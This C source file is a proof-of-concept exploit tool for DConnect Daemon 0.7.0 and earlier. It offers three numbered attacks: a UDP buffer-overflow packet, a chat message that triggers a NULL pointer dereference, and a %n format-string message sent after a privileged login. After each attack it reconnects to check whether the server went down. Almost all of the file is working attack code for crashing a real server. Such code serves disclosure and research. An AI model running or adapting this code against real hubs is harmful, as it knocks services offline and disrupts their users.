/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define strnicmp    strncasecmp
#endif



#define VER         "0.1"
#define PORT        411
#define BUFFSZ      8192
#define BOFSZ       400     // total pck size is 10000



void dcsend(int sd, u_char *cmd);
void dcrecv(int sd, u_char *buff, int size);
void delimit(u_char *p);
void show_dc_users(u_char *data, u_char *mynick);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u_int   seed;
    int     sd,
            attack,
            i,
            len;
    u_short port = PORT;
    u_char  *buff,
            nick[33],
            dnick[33],
            pass[33],
            key[128];

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "DConnect Daemon <= 0.7.0 and CVS 30 Jul 2006 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <host> [port(%hu)]\n"
            "\n"
            "Attacks:\n"
            " 1 = listen_thread_udp buffer-overflow\n"
            " 2 = dc_chat NULL pointer\n"
            " 3 = various format string bugs (privileges needed)\n"
            "\n", argv[0], port);
        exit(1);
    }

    attack = atoi(argv[1]);

    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    seed = time(NULL);
    sprintf(nick, "nick%u", ~seed);
    for(i = 0; i < (sizeof(key) - 1); i++) {
        seed = (seed * 0x343FD) + 0x269EC3;
        key[i] = seed;
        if(!key[i]) key[i] = 1;
    }
    key[i] = 0;

    if(attack == 1) {
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        len = sprintf(buff,
            "$SR nickname%0*u filename" "\x05" "3/9",
            BOFSZ,
            seed);

        printf(
            "- send buffer-overflow packet (%d bytes for a buffer of 32)\n"
            "  Note that the min_slots parameter in the server must be enabled\n",
            BOFSZ);
        if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();

        goto check;
    }

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    printf("- connect to server: ");
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    printf("ok\n");

    do {
        dcrecv(sd, buff, BUFFSZ);
    } while(strnicmp(buff, "$Lock ", 6));

    if(attack == 2) {
        sprintf(buff, "<%s> message|", nick);
        dcsend(sd, buff);
        goto check;
    }

    sprintf(buff, "$Key %s|", key);
    dcsend(sd, buff);

    if(attack == 3) {
        printf("- insert the nickanme of the superior user or the administrator:\n  ");
        fflush(stdin);
        fgets(nick, sizeof(nick), stdin);
        delimit(nick);

        printf("- insert the required password:\n  ");
        fflush(stdin);
        fgets(pass, sizeof(pass), stdin);
        delimit(pass);
    }

    sprintf(buff, "$ValidateNick %s|", nick);
    dcsend(sd, buff);

    if(attack == 3) {
        sprintf(buff, "$MyPass %s|", pass);
        dcsend(sd, buff);
    }

    do {
        dcrecv(sd, buff, BUFFSZ);
    } while(strnicmp(buff, "$Hello ", 7));

    sprintf(buff, "$MyINFO $ALL %s description$ $Cable" "\x01" "$email$800000000$|", nick);
    dcsend(sd, buff);

    do {
        dcrecv(sd, buff, BUFFSZ);
    } while(strnicmp(buff, "$MyINFO ", 8));

    if(attack == 3) {
        sprintf(buff, "$GetNickList |");
        dcsend(sd, buff);
        do {
            dcrecv(sd, buff, BUFFSZ);
        } while(strnicmp(buff, "$NickList ", 10));

        printf("- insert the nickname of another user from the list below:\n");
        show_dc_users(buff, nick);
        printf("  ");
        fflush(stdin);
        fgets(dnick, sizeof(dnick), stdin);
        delimit(dnick);

        sprintf(buff, "<%s> #msg %s %%n%%n%%n%%n%%n%%n%%n|", nick, dnick);
        dcsend(sd, buff);

//        unfortunately this useful command doesn't work for unknown reasons...
//        sprintf(buff, "<%s> #msg_all %%n%%n%%n%%n%%n%%n%%n|", nick);
//        dcsend(sd, buff);
    }

check:
    sleep(ONESEC);
    close(sd);
    sleep(ONESEC);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    printf("- check server:\n");
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) {
        printf("\n  Server IS vulnerable!!!\n\n");
    } else {
        printf("\n  Server doesn't seem vulnerable\n\n");
    }
    close(sd);
    return(0);
}



void dcsend(int sd, u_char *cmd) {
    int     cmdlen;
    u_char  *p;

    p = strchr(cmd, ' ');
    cmdlen = (p) ? (p - cmd) : (strlen(cmd) - 1);

    if(cmd[0] == '<') {
        printf("- send message\n");
    } else {
        printf("- send %.*s command\n", cmdlen, cmd);
    }
    if(send(sd, cmd, strlen(cmd), 0)
      < 0) std_err();
}



void dcrecv(int sd, u_char *buff, int size) {
    int     t;
    u_char  *p;

    p = buff;
    for(--size; size >= 0; p++, size--) {
        t = recv(sd, p, 1, 0);
        if(t < 0) std_err();
        if(!t) break;
        if(*p == '|') break;
    }
    *p = 0;
    printf(": %s\n", buff);
}



void delimit(u_char *p) {
    while(*p && (*p != '\n') && (*p != '\r')) p++;
    *p = 0;
}



void show_dc_users(u_char *data, u_char *mynick) {
    u_char  *p,
            *l;

    for(p = strchr(data, ' ') + 1; *p; p++) {
        if(*p == '$') continue;
        l = strchr(p, '$');
        if(!l) break;
        *l = 0;
        if(!strcmp(p, mynick)) {
            printf("  %s (this is your nick and you cannot choose it)\n", p);
        } else {
            printf("  %s\n", p);
        }
        p = l;
    }
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


